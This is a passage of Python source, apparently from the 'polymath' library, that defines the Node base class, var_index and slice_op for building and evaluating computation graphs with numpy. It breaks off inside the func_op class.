from polymath import UNSET_SHAPE, DEFAULT_SHAPES
import builtins
import operator
from collections import OrderedDict, deque
from collections.abc import Mapping, Sequence
import functools
from numbers import Integral, Rational, Real
import contextlib
import traceback
import uuid
import numpy as np
import importlib
from .graph import Graph
from .domain import Domain
from .util import _noop_callback, _flatten_iterable, node_hash, \
_is_node_type_instance, is_iterable
class Node(object):
"""
Base class for nodes.
Parameters
----------
args : tuple
Positional arguments passed to the `_evaluate` method.
name : str or None
Name of the node or `None` to use a random, unique identifier.
shape : tuple or None
Shape of the output for a node. This can be a tuple of integers or parameter node names.
graph : Node or None
Parent graph of this node. If graph is `None`, this is the top-level graph.
op_name : str
Operation name which describes the node functionality.
value : Any or None
If a node has a default value to use for execution, it can be set using `value`.
kwargs : dict
Keyword arguments passed to the `_evaluate` method.
"""
_graph_stack = deque([None])
_eval_stack = []
stack_size = 5
evaluated_nodes = 0
def __init__(self, *args,
name=None,
shape=None,
graph=None,
dependencies=None,
op_name=None,
value=None,
**kwargs):
self.nodes = Graph()
self.value = value
self.dependencies = []
self._args = []
        self._predecessors = []
        self._successors = []
self.args = args
if "name" in kwargs:
kwargs.pop("name")
self.added_attrs = []
        # TODO: Change this to an underscore-prefixed private variable
self.kwargs = kwargs
self.graph = graph
self._shape = OrderedDict()
self.shape = shape or tuple([])
# Get a list of all dependencies relevant to this node
self.dependencies = [] if dependencies is None else dependencies
if self.graph:
self.dependencies.extend(self.graph.dependencies)
# Choose a name for the node and add the node to the graph
self._name = None
self.name = name or uuid.uuid4().hex
self._op_name = None
self.op_name = op_name
# Get the stack context so we can report where the node was defined
self._stack = traceback.extract_stack(limit=1)
@property
def graph(self):
"""
polymath.srdfg.graph.Graph : Parent graph of this node. If graph is `None`, this is the top-level graph.
"""
return self._graph
    def preds(self):
        return self._predecessors
    def succs(self):
        return self._successors
def add_predecessor(self, pred):
if isinstance(pred, Node):
self._predecessors.append(pred.gname)
else:
self._predecessors.append(pred)
def add_successor(self, succ):
if isinstance(succ, Node):
            self._successors.append(succ.gname)
        else:
            self._successors.append(succ)
def set_edges(self):
for e in self.args:
self.add_predecessor(e)
if isinstance(e, Node):
e.add_successor(self)
@property
def domain(self):
return Domain(tuple([]))
@property
def args(self):
"""
tuple : Positional arguments which are used for executing this node.
"""
return tuple(self._args)
@property
def argnames(self):
return [a.name if isinstance(a, Node) else a for a in self.args]
@property
def shape(self):
"""
tuple : Shape of the output for a node. This can be a tuple of integers or parameter node names.
"""
return self._shape
@property
def var(self):
return self
@property
def name(self):
"""str : Unique name of the node"""
return self._name
@property
def op_name(self):
"""
str : Operation name which describes the node functionality.
"""
return self._op_name
@op_name.setter
def op_name(self, op_name):
if op_name:
self._op_name = op_name
elif self.__class__.__name__ == "Node":
self._op_name = self.name
else:
self._op_name = self.__class__.__name__
@name.setter
def name(self, name):
self.set_name(name)
@args.setter
def args(self, args):
new_args = []
for arg in args:
if isinstance(arg, Node):
if self.__class__.__name__ == "Node":
self.nodes[arg.name] = self.graph[arg.name]
new_args.append(arg)
self._args = tuple(new_args)
@shape.setter
def shape(self, shape):
self.set_shape(shape, init=True)
@graph.setter
def graph(self, graph):
self._graph = Node.get_active_graph(graph)
@property
def gname(self):
scope_names = [self.name]
cgraph = self.graph
while cgraph:
scope_names.append(cgraph.name)
cgraph = cgraph.graph
return "/".join(list(reversed(scope_names)))
def __enter__(self):
Node._graph_stack.append(self)
return self
def __exit__(self, *args):
assert self == Node._graph_stack.pop()
def __repr__(self):
return "<node '%s'>" % self.name
def add_attribute(self, key, value):
self.added_attrs.append(key)
self.kwargs[key] = value
def is_shape_finalized(self):
if self.shape == UNSET_SHAPE:
return False
for s in self.shape:
if not isinstance(s, Integral):
return False
return True
def set_shape(self, shape=None, init=False):
if isinstance(shape, float):
self._shape = tuple([np.int(shape)])
elif isinstance(shape, Integral):
self._shape = tuple([shape])
elif isinstance(shape, Node):
self._shape = tuple([shape])
elif not shape or len(shape) == 0:
# TODO: Change in order to enable "is shape finalized" to work
self._shape = UNSET_SHAPE
else:
shapes = []
for dim in shape:
if isinstance(dim, (Node, Integral)):
shapes.append(dim)
elif isinstance(dim, float):
shapes.append(int(dim))
else:
raise TypeError(f"Shape value must be placeholder or integer value for {self.name}\n"
f"\tDim: {dim}"
f"\n\t{self.kwargs} ")
self._shape = tuple(shapes)
@staticmethod
def get_active_graph(graph=None):
"""
Obtain the currently active graph instance by returning the explicitly given graph or using
the default graph.
Parameters
----------
graph : Node or None
Graph to return or `None` to use the default graph.
Raises
------
ValueError
If no `Graph` instance can be obtained.
"""
graph = graph or Node._graph_stack[-1]
return graph
def instantiate_node(self, node): # pylint:disable=W0621
"""
Instantiate nodes by retrieving the node object associated with the node name.
Parameters
----------
node : Node or str
            Node instance or name of a node.
Returns
-------
instantiated_node : Node
Node instance.
Raises
------
ValueError
            If `node` is not a `Node` instance or a node name.
        RuntimeError
            If `node` is a `Node` instance but does not belong to this graph.
"""
if isinstance(node, str):
return self.nodes[node]
if isinstance(node, Node):
if node.name not in self.nodes and (node.graph != self):
raise RuntimeError(f"node '{node}' does not belong to {self} graph, instead belongs to"
f" {node.graph}")
return node
        raise ValueError(f"'{node}' is not a `Node` instance or node name")
def instantiate_graph(self, context, **kwargs):
"""
Instantiate a graph by replacing all node names with node instances.
.. note::
This function modifies the context in place. Use :code:`context=context.copy()` to avoid
the context being modified.
Parameters
----------
context : dict[Node or str, object]
Context whose keys are node instances or names.
kwargs : dict[str, object]
Additional context information keyed by variable name.
Returns
-------
normalized_context : dict[Node, object]
Normalized context whose keys are node instances.
Raises
------
ValueError
If the context specifies more than one value for any node.
ValueError
If `context` is not a mapping.
"""
if context is None:
context = {}
elif not isinstance(context, Mapping):
raise ValueError("`context` must be a mapping.")
nodes = list(context)
# Add the keyword arguments
for node in nodes: # pylint:disable=W0621
value = context.pop(node)
node = self.instantiate_node(node)
if node in context:
raise ValueError(f"duplicate unequal value for node '{node}'")
context[node] = value
if node.op_name in ["placeholder", "state", "input", "output", "temp"] and not node.is_shape_finalized():
context[node] = node.evaluate(context)
for name, value in kwargs.items():
node = self.nodes[name]
if node in context:
raise ValueError(f"duplicate value for node '{node}'")
context[node] = value
if node.op_name in ["placeholder", "state", "input", "output", "temp"] and not node.is_shape_finalized():
context[node] = node.evaluate(context)
return context
def run(self, fetches, context=None, *, callback=None, **kwargs):
"""
Evaluate one or more nodes given a dictionary of node names with their values.
.. note::
This function modifies the context in place. Use :code:`context=context.copy()` to avoid
the context being modified.
Parameters
----------
fetches : list[str or Node] or str or Node
One or more `Node` instances or names to evaluate.
context : dict or None
Context in which to evaluate the nodes.
callback : callable or None
            Callback to be evaluated when a node is evaluated.
kwargs : dict
Additional context information keyed by variable name.
Returns
-------
values : Node or tuple[object]
Output of the nodes given the context.
Raises
------
ValueError
            If `fetches` is not a `Node` instance, node name, or a sequence thereof.
"""
if isinstance(fetches, (str, Node)):
fetches = [fetches]
single = True
elif isinstance(fetches, Sequence):
single = False
else:
            raise ValueError("`fetches` must be a `Node` instance, node name, or a "
"sequence thereof.")
fetches = [self.instantiate_node(node) for node in fetches]
context = self.instantiate_graph(context, **kwargs)
for c in context:
if c in fetches and c.op_name in ["output", "state", "temp"]:
write_name = "/".join([f"{i}{c.write_count-1}" for i in c.name.split("/")]) if c.write_count > 0 else c.name
fetches[fetches.index(c)] = c.graph.nodes[write_name]
values = [fetch.evaluate_node(fetch, context, callback=callback) for fetch in fetches]
return values[0] if single else tuple(values)
def __getstate__(self):
return self.__dict__
def __setstate__(self, data):
self.__dict__.update(data)
def set_name(self, name):
"""
Set the name of the node and update the graph.
Parameters
----------
value : str
Unique name of the node.
Returns
-------
self : Node
This node.
Raises
------
ValueError
            If a node with `value` already exists in the associated graph.
KeyError
If the current name of the node cannot be found in the associated graph.
"""
name = name or uuid.uuid4().hex
        # TODO: Need a way to check if the existing node is not equal to the current node as well
if self.graph and name in self.graph.nodes:
raise ValueError(f"duplicate name '{name}' in {self.graph.name}:\n\t"
f"Existing: {self.graph.nodes[name].args}\n\t"
f"New: {self.args}")
if self.graph:
graph = self.graph
if self._name and self._name in graph.nodes:
graph.update_graph_key(self._name, name)
else:
graph.nodes[name] = self
self._name = name
return self
def evaluate_dependencies(self, context, callback=None):
"""
Evaluate the dependencies of this node and discard the values.
Parameters
----------
context : dict
Normalised context in which to evaluate the node.
callback : callable or None
            Callback to be evaluated when a node is evaluated.
"""
for node in self.dependencies:
node.evaluate(context, callback)
def evaluate(self, context, callback=None):
"""
Evaluate the node given a context.
Parameters
----------
context : dict
Normalised context in which to evaluate the node.
callback : callable or None
            Callback to be evaluated when a node is evaluated.
Returns
-------
value : object
Output of the node given the context.
"""
# Evaluate all explicit dependencies first
self.evaluate_dependencies(context, callback)
if self in context:
return context[self]
# Evaluate the parents
partial = functools.partial(self.evaluate_node, context=context, callback=callback)
args = [partial(arg) for arg in self.args]
kwargs = {key: partial(value) for key, value in self.kwargs.items() if key not in self.added_attrs}
# Evaluate the node
callback = callback or _noop_callback
with callback(self, context):
if self.__class__.__name__ == "Node":
context[self] = self.value = self._evaluate(*args, context=context, **kwargs)
else:
context[self] = self.value = self._evaluate(*args, **kwargs)
return self.value
def _evaluate(self, *args, context=None, **kwargs):
"""
Inheriting nodes should implement this function to evaluate the node.
"""
return self(*args, context, **kwargs)
@classmethod
def evaluate_node(cls, node, context, **kwargs):
"""
        Evaluate a node or constant given a context.
"""
Node.evaluated_nodes += 1
try:
if isinstance(node, Node):
Node._eval_stack.append(node.name)
return node.evaluate(context, **kwargs)
partial = functools.partial(cls.evaluate_node, context=context, **kwargs)
if isinstance(node, tuple):
return tuple(partial(element) for element in node)
if isinstance(node, list):
return [partial(element) for element in node]
if isinstance(node, dict):
return {partial(key): partial(value) for key, value in node.items()}
if isinstance(node, slice):
return slice(*[partial(getattr(node, attr))
for attr in ['start', 'stop', 'step']])
return node
except Exception as ex: # pragma: no cover
messages = []
interactive = False
if isinstance(node, Node) or not is_iterable(node):
node = [node]
for n in node:
stack = []
if isinstance(n, Node):
for frame in reversed(n._stack): # pylint: disable=protected-access
# Do not capture any internal stack traces
fname = frame.filename
if 'polymath' in fname:
continue
# Stop tracing at the last interactive cell
if interactive and not fname.startswith('<'):
break # pragma: no cover
interactive = fname.startswith('<')
stack.append(frame)
stack = "".join(traceback.format_list(reversed(stack)))
message = "Failed to evaluate node `%s` defined at:\n\n%s" % (n, stack)
messages.append(message)
raise ex from EvaluationError("".join(messages))
@classmethod
def init_from_args(cls, *args,
name=None,
shape=None,
graph=None,
dependencies=None,
op_name=None,
value=None,
**kwargs):
if len(args) == 0:
n = cls(name=name,
shape=shape,
graph=graph,
op_name=op_name,
dependencies=dependencies,
value=value,
**kwargs)
else:
n = cls(*args,
name=name,
shape=shape,
graph=graph,
op_name=op_name,
dependencies=dependencies,
value=value,
**kwargs)
return n
def __bool__(self):
return True
def __hash__(self):
return id(self)
def func_hash(self):
"""
This returns the functional hash of a particular node. The default hash returns an object id, whereas this function
returns a hash of all attributes and subgraphs of a node.
"""
return node_hash(self)
def find_node(self, name):
g = self.graph
while g is not None and name not in g.nodes:
g = g.graph
if name in g.nodes:
return g.nodes[name]
raise RuntimeError(f"Cannot find {name} in graph nodes. Graph: {self.graph}")
def __len__(self):
        #TODO: Update this to check for finalized shape
if self.shape == UNSET_SHAPE:
raise TypeError(f'`shape` must be specified explicitly for nodes {self}')
return self.shape[0]
def __iter__(self):
num = len(self)
for i in range(num):
yield self[i]
def __eq__(self, other):
return hash(self) == hash(other)
def __getattr__(self, name):
return getattr_(self, name, graph=self.graph)
def __getitem__(self, key):
if self.__class__.__name__ != "Node":
if isinstance(key, (slice, Integral)):
return getitem(self, key, graph=self.graph)
else:
if isinstance(key, (list)):
return var_index(self, key, graph=self)
elif isinstance(key, tuple):
return var_index(self, list(key), graph=self)
else:
return var_index(self, [key], graph=self)
else:
return self.nodes[key]
def __add__(self, other):
return add(self, other, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__radd__(self)
def __radd__(self, other):
return add(other, self, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__add__(self)
def __sub__(self, other):
return sub(self, other, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__rsub__(self)
def __rsub__(self, other):
return sub(other, self, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__sub__(self)
def __pow__(self, other):
return pow_(self, other, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__rpow__(self)
def __rpow__(self, other):
return pow_(other, self, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__rpow__(self)
def __matmul__(self, other):
return matmul(self, other, graph=self.graph)
def __rmatmul__(self, other):
return matmul(other, self, graph=self.graph)
def __mul__(self, other):
return mul(self, other, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__rmul__(self)
def __rmul__(self, other):
return mul(other, self, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__mul__(self)
def __truediv__(self, other):
return truediv(self, other, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__truediv__(self)
def __rtruediv__(self, other):
return truediv(other, self, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__rtruediv__(self)
def __floordiv__(self, other):
return floordiv(self, other, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__rfloordiv__(self)
def __rfloordiv__(self, other):
return floordiv(other, self, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__floordiv__(self)
def __mod__(self, other):
return mod(self, other, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__rmod__(self)
def __rmod__(self, other):
return mod(other, self, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__mod__(self)
def __lshift__(self, other):
return lshift(self, other, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__rlshift__(self)
def __rlshift__(self, other):
return lshift(other, self, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__lshift__(self)
def __rshift__(self, other):
return rshift(self, other, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__rrshift__(self)
def __rrshift__(self, other):
return rshift(other, self, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__rshift__(self)
def __and__(self, other):
return and_(self, other, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__rand__(self)
def __rand__(self, other):
return and_(other, self, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__and__(self)
def __or__(self, other):
return or_(self, other, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__ror__(self)
def __ror__(self, other):
return or_(other, self, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__or__(self)
def __xor__(self, other):
return xor(self, other, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__rxor__(self)
def __rxor__(self, other):
return xor(other, self, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__xor__(self)
def __lt__(self, other):
return lt(self, other, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__gt__(self)
def __le__(self, other):
return le(self, other, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__ge__(self)
def __ne__(self, other):
return ne(self, other, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__ne__(self)
def __gt__(self, other):
return gt(self, other, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__lt__(self)
def __ge__(self, other):
return ge(self, other, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__le__(self)
def __invert__(self):
return inv(self, graph=self.graph)
def __neg__(self):
return neg(self, graph=self.graph)
def __abs__(self):
return abs_(self, graph=self.graph)
def __pos__(self):
return pos(self, graph=self.graph)
def __reversed__(self):
return reversed_(self, graph=self.graph)
def update_graph_key(self, old_key, new_key):
n = list(map(lambda k: (new_key, self.nodes[k]) if k == old_key else (k, self.nodes[k]), self.nodes.keys()))
self.nodes = Graph(n)
def insert_node(self, node, idx):
node_list = list(self.nodes.items())
node_list.insert(idx, (node.name, node))
self.nodes = Graph(node_list)
def __call__(self, *args, **kwargs):
return self.run(*args, **kwargs)
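# Illustrative sketch (hypothetical usage, simplified from the docstrings above): a Node
# used as a context manager acts as the active graph, collecting nodes created inside it,
# and run() evaluates a fetch by name. Plain Python values stand in for placeholder nodes.
#
#   with Node(name="main") as g:
#       total = add(2, 3, name="total")   # `add` is the nodeop-wrapped operator.add defined below
#   g.run("total")                        # -> 5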
class EvaluationError(RuntimeError):
"""
    Failed to evaluate a node.
"""
class var_index(Node): # pylint: disable=C0103,W0223
"""
Node representing values of a variable corresponding to input index values.
Parameters
----------
var : Node
The multi-dimensional variable used for indexing into.
idx : tuple
Tuple of either integer values or index/index_op nodes.
"""
def __init__(self, var, idx, name=None, **kwargs): # pylint: disable=W0235
if "domain" in kwargs:
domain = tuple(kwargs.pop("domain")) if isinstance(kwargs["domain"], list) else kwargs.pop("domain")
else:
domain = Domain(idx)
super(var_index, self).__init__(var, idx, name=name, domain=domain, **kwargs)
@property
def domain(self):
return self.kwargs["domain"]
@property
def var(self):
var, index_list = self.args
return var
def set_name(self, name):
"""
Set the name for a variable index, making sure to replicate the new name with
        a unique string which corresponds to the variable, index combination.
Parameters
----------
value : str
Unique name of the node.
Returns
-------
self : Node
This node.
Raises
------
ValueError
            If a node with `value` already exists in the associated graph.
KeyError
If the current name of the node cannot be found in the associated graph.
"""
        # TODO: Need a way to check if the existing node is not equal to the current node as well
if self.graph and name in self.graph.nodes:
raise ValueError(f"duplicate name '{name}' in {self.graph.name}:"
f"Existing: {self.graph.nodes[name].args}\n"
f"New: {self.args}")
if self.graph:
graph = self.graph
if self._name is not None and self._name in graph.nodes:
graph.update_graph_key(self._name, name)
else:
graph.nodes[name] = self
self._name = name
return self
def __getitem__(self, key):
if self.is_shape_finalized() and len(self.nodes) >= np.prod(self.shape):
if isinstance(key, Integral):
key = tuple([key])
idx = np.ravel_multi_index(key, dims=self.shape, order='C')
ret = self.nodes.item_by_index(idx)
return ret
else:
if isinstance(key, (list)):
ret = var_index(self.var, tuple(key), graph=self)
elif isinstance(key, tuple):
ret = var_index(self.var, key, graph=self)
else:
ret = var_index(self.var, tuple([key]), graph=self)
return ret
def is_scalar(self, val=None):
if val is not None and (not isinstance(val, np.ndarray) or (len(val.shape) == 1 and val.shape[0] == 1)):
if self.var.shape != DEFAULT_SHAPES[0] and (len(self.var.shape) == 1 and not isinstance(self.var.shape[0],Node)):
raise ValueError(f"Invalid shape var for var index {self} with variable shape {self.var.shape}")
return True
else:
return self.var.shape == DEFAULT_SHAPES[0]
def _evaluate(self, var, indices, **kwargs):
if self.is_scalar(var):
out_shape = (1,)
indices = (0,)
single = True
else:
out_shape = self.domain.shape_from_indices(indices)
indices = self.domain.compute_pairs()
single = False
if isinstance(var, (Integral, Real, str)):
var = np.asarray([var])
elif not isinstance(var, (np.ndarray, list)):
raise TypeError(f"Variable {var} with type {type(var)} is not a list or numpy array, and cannot be sliced for {self.name}")
elif isinstance(var, list):
var = np.asarray(var)
if len(var.shape) != len(out_shape) and np.prod(var.shape) == np.prod(out_shape):
if len(out_shape) > len(var.shape):
for i in range(len(out_shape)):
if out_shape[i] == 1:
var = np.expand_dims(var, axis=i)
else:
var = np.squeeze(var)
if len(var.shape) != len(out_shape) and np.prod(var.shape) != np.prod(out_shape):
raise ValueError(f"Index list does not match {var.shape} in {self.var.name} - {self.var.op_name}"
f"dimensions for slice {self.args[0].name} with {out_shape}.\n"
f"Domain: {self.domain}\n"
f"Eval Stack: {Node._eval_stack}")
if not single and not all([(idx_val - 1) >= indices[-1][idx] for idx, idx_val in enumerate(var.shape)]):
raise ValueError(f"var_index {self.name} has indices which are greater than the variable shape:\n"
f"\tArgs: {self.args}\n"
f"\tVar shape: {var.shape}\n"
f"\tNode shape: {self.var.shape}\n"
f"\tIndex Upper bounds: {indices[-1]}")
indices = list(map(lambda x: x.tolist() if isinstance(x, np.ndarray) else x, indices))
res = var[indices] if single else np.asarray([var[idx] for idx in indices]).reshape(out_shape)
if out_shape == (1,) and len(indices) == 1:
res = res[0]
self.domain.set_computed(out_shape, indices)
return res
def __add__(self, other):
return slice_op(operator.add, self, other, graph=self.graph)
def __radd__(self, other):
return slice_op(operator.add, other, self, graph=self.graph)
def __sub__(self, other):
return slice_op(operator.sub, self, other, graph=self.graph)
def __rsub__(self, other):
return slice_op(operator.sub, other, self, graph=self.graph)
def __pow__(self, other):
return slice_op(builtins.pow, self, other, graph=self.graph)
def __rpow__(self, other):
return slice_op(builtins.pow, other, self, graph=self.graph)
def __mul__(self, other):
return slice_op(operator.mul, self, other, graph=self.graph)
def __rmul__(self, other):
return slice_op(operator.mul, other, self, graph=self.graph)
def __truediv__(self, other):
return slice_op(operator.truediv, self, other, graph=self.graph)
def __rtruediv__(self, other):
return slice_op(operator.truediv, other, self, graph=self.graph)
def __floordiv__(self, other):
return slice_op(operator.floordiv, self, other, graph=self.graph)
def __rfloordiv__(self, other):
return slice_op(operator.floordiv, other, self, graph=self.graph)
def __mod__(self, other):
return slice_op(operator.mod, self, other, graph=self.graph)
def __rmod__(self, other):
return slice_op(operator.mod, other, self, graph=self.graph)
def __lshift__(self, other):
return slice_op(operator.lshift, self, other, graph=self.graph)
def __rlshift__(self, other):
return slice_op(operator.lshift, other, self, graph=self.graph)
def __rshift__(self, other):
return slice_op(operator.rshift, self, other, graph=self.graph)
def __rrshift__(self, other):
return slice_op(operator.rshift, other, self, graph=self.graph)
def __and__(self, other):
return slice_op(operator.and_, self, other, graph=self.graph)
def __rand__(self, other):
return slice_op(operator.and_, other, self, graph=self.graph)
def __or__(self, other):
return slice_op(operator.or_, self, other, graph=self.graph)
def __ror__(self, other):
return slice_op(operator.or_, other, self, graph=self.graph)
def __xor__(self, other):
return slice_op(operator.xor, self, other, graph=self.graph)
def __rxor__(self, other):
return slice_op(operator.xor, other, self, graph=self.graph)
def __lt__(self, other):
return slice_op(operator.lt, self, other, graph=self.graph)
def __le__(self, other):
return slice_op(operator.lt, other, self, graph=self.graph)
def __ne__(self, other):
return slice_op(operator.ne, self, other, graph=self.graph)
def __gt__(self, other):
return slice_op(operator.gt, self, other, graph=self.graph)
def __ge__(self, other):
return slice_op(operator.ge, self, other, graph=self.graph)
def __repr__(self):
return "<var_index name=%s, index=%s>" % (self.name, self.args)
class slice_op(Node):
"""
Node representing multi-dimensional operations performed on a node.
Parameters
----------
    target : callable
        The callable operation applied across the sliced operands.
    args : tuple
        The operand nodes or values the operation is applied to.
"""
def __init__(self, target, *args, **kwargs):
if "domain" in kwargs:
domain = tuple(kwargs.pop("domain")) if isinstance(kwargs["domain"], list) else kwargs.pop("domain")
else:
all_args = _flatten_iterable(args)
slice1_var, slice1_idx, slice2_var, slice2_idx = self.get_index_nodes(all_args[0], all_args[1])
domain = slice1_idx.combine_set_domains(slice2_idx)
if "op_name" in kwargs:
kwargs.pop("op_name")
target_name = f"{target.__module__}.{target.__name__}"
super(slice_op, self).__init__(*args, target=target_name, domain=domain, op_name=f"slice_{target.__name__}", **kwargs)
self.target = target
@property
def domain(self):
return self.kwargs["domain"]
def __getitem__(self, key):
if isinstance(key, (tuple, list, np.ndarray)) and len(key) == 0:
return self
elif self.is_shape_finalized() and len(self.nodes) > 0:
if isinstance(key, (int, Node)):
key = tuple([key])
if len(key) != len(self.shape):
raise KeyError(f"Invalid key shape for {self.name}:\n"
f"Shape: {self.shape}\n"
f"Key: {key}")
name = f"{self.name}{key}"
if name not in self.nodes.keys():
raise KeyError(f"{name} not in {self.name} keys:\n"
f"Node keys: {list(self.nodes.keys())}")
ret = self.nodes[name]
return ret
else:
name = []
if isinstance(key, Node):
name.append(key.name)
elif hasattr(key, "__len__") and not isinstance(key, str):
for k in key:
if isinstance(k, Node):
name.append(k.name)
else:
name.append(str(k))
else:
name.append(key)
name = self.var.name + "[" + "][".join(name) + "]"
if name in self.graph.nodes:
return self.graph.nodes[name]
elif isinstance(key, (list)):
return var_index(self, key, name=name, graph=self.graph)
elif isinstance(key, tuple):
return var_index(self, list(key), name=name, graph=self.graph)
else:
return var_index(self, [key], name=name, graph=self.graph)
def set_shape(self, shape=None, init=False):
s = []
assert isinstance(shape, (tuple, list))
if all([isinstance(sv, Integral) for sv in shape]) and len(self.domain) == np.product(shape) and len(shape) > 0:
self._shape = shape if isinstance(shape, tuple) else tuple(shape)
else:
for idx, d in enumerate(self.domain.dom_set):
if shape and isinstance(shape[idx], (func_op, Integral)):
s.append(shape[idx])
elif shape and isinstance(shape[idx], float):
s.append(int(shape[idx]))
elif isinstance(d, float):
s.append(int(d))
elif isinstance(d, var_index):
s.append(d.domain)
else:
s.append(d)
self._shape = tuple(s)
def is_scalar(self, val):
return not isinstance(val, np.ndarray) or (len(val.shape) == 1 and val.shape[0] == 1)
def _evaluate(self, op1, op2, context=None, **kwargs):
if self.is_scalar(op1) or self.is_scalar(op2):
value = self.target(op1, op2)
else:
arg0_dom = self.args[0].domain
arg1_dom = self.args[1].domain
op1_idx = self.domain.map_sub_domain(arg0_dom) if isinstance(self.args[0], Node) else tuple([])
op2_idx = self.domain.map_sub_domain(arg1_dom) if isinstance(self.args[1], Node) else tuple([])
op1 = np.asarray(list(map(lambda x: op1[x], op1_idx))).reshape(self.domain.computed_shape)
op2 = np.asarray(list(map(lambda x: op2[x], op2_idx))).reshape(self.domain.computed_shape)
value = self.target(op1, op2)
return value
def get_index_nodes(self, slice1_var=None, slice2_var=None):
if slice1_var is None and slice2_var is None:
slice1_var, slice2_var = self.args
if isinstance(slice1_var, (slice_op, var_index)) or _is_node_type_instance(slice1_var, "GroupNode"):
slice1_idx = slice1_var.domain
elif _is_node_type_instance(slice1_var, "index"):
slice1_idx = slice1_var.domain
else:
slice1_idx = Domain(tuple([]))
if isinstance(slice2_var, (slice_op, var_index)) or _is_node_type_instance(slice2_var, "GroupNode"):
slice2_idx = slice2_var.domain
elif _is_node_type_instance(slice2_var, "index"):
slice2_idx = slice2_var.domain
else:
slice2_idx = Domain(tuple([]))
return slice1_var, slice1_idx, slice2_var, slice2_idx
def __add__(self, other):
return slice_op(operator.add, self, other, graph=self.graph)
def __radd__(self, other):
return slice_op(operator.add, other, self, graph=self.graph)
def __sub__(self, other):
return slice_op(operator.sub, self, other, graph=self.graph)
def __rsub__(self, other):
return slice_op(operator.sub, other, self, graph=self.graph)
def __pow__(self, other):
return slice_op(builtins.pow, self, other, graph=self.graph)
def __rpow__(self, other):
return slice_op(builtins.pow, other, self, graph=self.graph)
def __mul__(self, other):
return slice_op(operator.mul, self, other, graph=self.graph)
def __rmul__(self, other):
return slice_op(operator.mul, other, self, graph=self.graph)
def __truediv__(self, other):
return slice_op(operator.truediv, self, other, graph=self.graph)
def __rtruediv__(self, other):
return slice_op(operator.truediv, other, self, graph=self.graph)
def __floordiv__(self, other):
return slice_op(operator.floordiv, self, other, graph=self.graph)
def __rfloordiv__(self, other):
return slice_op(operator.floordiv, other, self, graph=self.graph)
def __mod__(self, other):
return slice_op(operator.mod, self, other, graph=self.graph)
def __rmod__(self, other):
return slice_op(operator.mod, other, self, graph=self.graph)
def __lshift__(self, other):
return slice_op(operator.lshift, self, other, graph=self.graph)
def __rlshift__(self, other):
return slice_op(operator.lshift, other, self, graph=self.graph)
def __rshift__(self, other):
return slice_op(operator.rshift, self, other, graph=self.graph)
def __rrshift__(self, other):
return slice_op(operator.rshift, other, self, graph=self.graph)
def __and__(self, other):
return slice_op(operator.and_, self, other, graph=self.graph)
def __rand__(self, other):
return slice_op(operator.and_, other, self, graph=self.graph)
def __or__(self, other):
return slice_op(operator.or_, self, other, graph=self.graph)
def __ror__(self, other):
return slice_op(operator.or_, other, self, graph=self.graph)
def __xor__(self, other):
return slice_op(operator.xor, self, other, graph=self.graph)
def __rxor__(self, other):
return slice_op(operator.xor, other, self, graph=self.graph)
def __lt__(self, other):
return slice_op(operator.lt, self, other, graph=self.graph)
def __le__(self, other):
return slice_op(operator.lt, other, self, graph=self.graph)
def __ne__(self, other):
return slice_op(operator.ne, self, other, graph=self.graph)
def __gt__(self, other):
return slice_op(operator.gt, self, other, graph=self.graph)
def __ge__(self, other):
return slice_op(operator.ge, self, other, graph=self.graph)
def __repr__(self):
return "<slice_%s '%s'>" % (self.target.__name__, self.name)
class func_op(Node): # pylint: disable=C0103,R0903
"""
Node wrapper for stateless functions.
Parameters
----------
target : callable
function to evaluate the node
args : tuple
positional arguments passed to the target
kwargs : dict
keywoard arguments passed to the target
"""
def __init__(self, target, *args, **kwargs):
kwargs["op_name"] = kwargs["op_name"] if "op_name" in kwargs \
else f"{target.__name__}"
if "domain" in kwargs:
domain = tuple(kwargs.pop("domain")) if isinstance(kwargs["domain"], list) else kwargs.pop("domain")
elif len(args) == 2:
all_args = _flatten_iterable(args)
slice1_var, slice1_idx, slice2_var, slice2_idx = self.get_index_nodes(all_args[0], all_args[1])
domain = slice1_idx.combine_set_domains(slice2_idx)
else:
domain = Domain(tuple([]))
self._target = None
super(func_op, self).__init__(*args, target=f"{target.__module__}.{target.__name__}", domain=domain, **kwargs)
self.target = target
self.added_attrs += ["domain", "target"]
@property
def target(self):
return self._target
@target.setter
def target(self, fnc):
self._target = fnc
